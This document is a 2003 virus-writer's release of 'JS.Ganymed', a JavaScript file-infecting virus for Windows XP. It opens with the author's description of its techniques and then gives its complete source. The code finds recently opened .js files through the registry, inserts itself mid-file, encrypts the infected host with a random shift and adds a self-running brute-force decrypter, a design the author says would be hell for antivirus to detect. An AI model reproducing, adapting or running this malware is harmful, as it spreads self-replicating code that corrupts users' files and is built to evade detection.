JS.Ganymed for Windows XP    [by Second Part To Hell]
[executable virus in a zip archive]

  

  JS.Ganymed for Windows XP
  by Second Part To Hell[rRlf]
  www.spth.de.vu
  spth@aonmail.at
  written on 11.05.2003
  in Austria

  What's that, you may think. I will explain you: A JavaScript virus, which searchs
  for his victims in the registry. This registry-key don't exist at Win95/98/Me.
  The virus infects the files in the middle of there code (it searchs for a function,
  copies itself befor that function and make a call at the start of there code to
  the function). This techique is also called EPO. When he finished infecting a file,
  it encrypts the whole file (the virus and the victim code) with a random number
  (The main idea of this technique I saw in jackie's "don't hide, come out! (jscript
  encryption, a humble approach)" article). In the end, it adds an decrypter to the
  file (without the number it encrypt the file), otherwise it won't work. That means,
  the virus uses a "Bruteforce-Polymorphism" (=encrypt without saving the encryption-key).

  General Virus Information:
  VirusName................... JS.Ganymed
  VirusAuthor................. Second Part To Hell[rRlf]
  Infection Way............... Searching files from registry and infect in the
                               middle of the code
  Payload..................... No
  Encryption.................. Yes
  Encrypt Hostfile............ Yes
  EPO......................... Yes
  Polymorphism................ Yes
    BruteFore................. Yes

  I'm sure, it would be hell for AVs to detect the virus, moreover it would be nearly
  impossible to delete the virus from the file, so that the file works normal.
  The host file needs the virus to become activ, that's the reason for it.
  Now, much thanks for reading this...

  I have to thank jackie for the article he wrote (I tried to don't use much of your things)

-------------------------------------[JS.Ganymed for Windows XP]-------------------------------------
Ganymed()
function Ganymed()
{
  var fso=WScript.CreateObject("Scripting.FileSystemObject")
  var shell=WScript.CreateObject("WScript.Shell")
  MRUList=shell.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\OpenSaveMRU\\js\\MRUList")
  for (i=1; i<=MRUList.length; i++)
  {
    file=shell.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\OpenSaveMRU\\js\\"+MRUList.substring(i-1,i))
    if (fso.FileExists(file))
    {
      var check=0; code=""; mycode=""; crypt="";
      var line=String.fromCharCode(13)+String.fromCharCode(10)
      victimfile=fso.OpenTextFile(file)
      viccontent=victimfile.ReadAll()
      victimfile.Close()
      infchecka=fso.OpenTextFile(file)
      infcheck=infchecka.ReadLine()
      infchecka.Close()
      if (infcheck!="/* Ganymed")
      {
        victimfile=fso.OpenTextFile(file)
        myfile=fso.OpenTextFile(WScript.ScriptFullName)
        for (j=0; j<500; j++)
        {
          code=myfile.ReadLine();
          if (code=="function Ganymed()") { mycode+=code+line; j=500; for (k=0; k<60; k++) { mycode+=myfile.ReadLine()+line } }
        }
        myfile.Close()
        for (l=1; l<viccontent.length; l++)
        {
          victimcodea=victimfile.Read(1)
          if (victimcodea=="f")
          {
            victimcodea+=victimfile.Read(7)
            l+=7;
            if (victimcodea=="function" && check==0 ) { var mark=l-8; var check=1}
          }
        }
        victimfile.Close()
        victimAll=fso.OpenTextFile(file)
        startcode=viccontent.substring(0,mark)
        endcode=viccontent.substring(mark,viccontent.length)
        victim=fso.OpenTextFile(file,2)
        victim.Write("Ganymed()"+line+startcode+line+mycode+line+endcode)
        victim.Close()
      }
      incry=fso.OpenTextFile(file)
      incontent=incry.ReadAll()
      incry.Close()
      rand=Math.round(Math.random()*5)+1
      for (i=0; i<incontent.length; i++)
      {
        crypt+=String.fromCharCode(incontent.charCodeAt(i)-rand)
      }
      cryptvic=fso.OpenTextFile(file,2)
      comma=String.fromCharCode(34)
      cryptvic.Write("/* Ganymed"+line+crypt+line+"*/"+line+"var fso=WScript.CreateObject("+comma+"Scripting.FileSystemObject"+comma+")"+line+"var shell=WScript.CreateObject("+comma+"WScript.Shell"+comma+")"+line+"openme=fso.OpenTextFile(WScript.ScriptFullName)"+line+"for (i=0; i<2; i++) { code=openme.ReadLine() }"+line+"openme.Close()"+line+"check=code.substring(0,1)"+line+"for (j=0; j<10; j++) { if (check=="+comma+"G"+comma+") { var dec=j; }"+line+"check=String.fromCharCode(check.charCodeAt(0)+1) }"+line+"var newcode="+comma+comma+";"+line+"for (k=0; k<code.length; k++) { newcode+=String.fromCharCode(code.charCodeAt(k)+dec) }"+line+"newfile=fso.CreateTextFile("+comma+"decrypt.js"+comma+")"+line+"newfile.Write(newcode)"+line+"newfile.Close()"+line+"shell.Run("+comma+"decrypt.js"+comma+")")
      cryptvic.Close()
    }
  }
}